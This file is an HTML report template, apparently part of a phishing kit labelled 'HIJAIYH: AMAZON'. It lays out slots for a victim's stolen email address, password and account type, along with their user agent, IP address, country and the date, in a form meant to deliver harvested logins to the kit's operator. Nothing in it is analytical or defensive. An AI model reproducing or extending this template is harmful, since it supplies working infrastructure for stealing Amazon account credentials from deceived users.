<fieldset style="border: 2px solid #0061ff;border-radius:10px;max-width: 60%;margin: 0 auto"><legend><b><font color="red">POWERED BY </font><font color="blue">HIJAIYH:</font><font color="orange">AMAZON</font></b></legend>
<pre>
<b>## Email Information ##</b>
<font color="red">
## Type              :: <b>{type}</b>
## Email             :: {email}
## Password          :: {password}
</font>
<b>## Access Information ##</b>
<font color="#0071ce">
## User Agent        :: {useragent}  
## IP Address        :: {ip}
## Country           :: {country}
## Date              :: {date}
</font>
</pre>
</fieldset>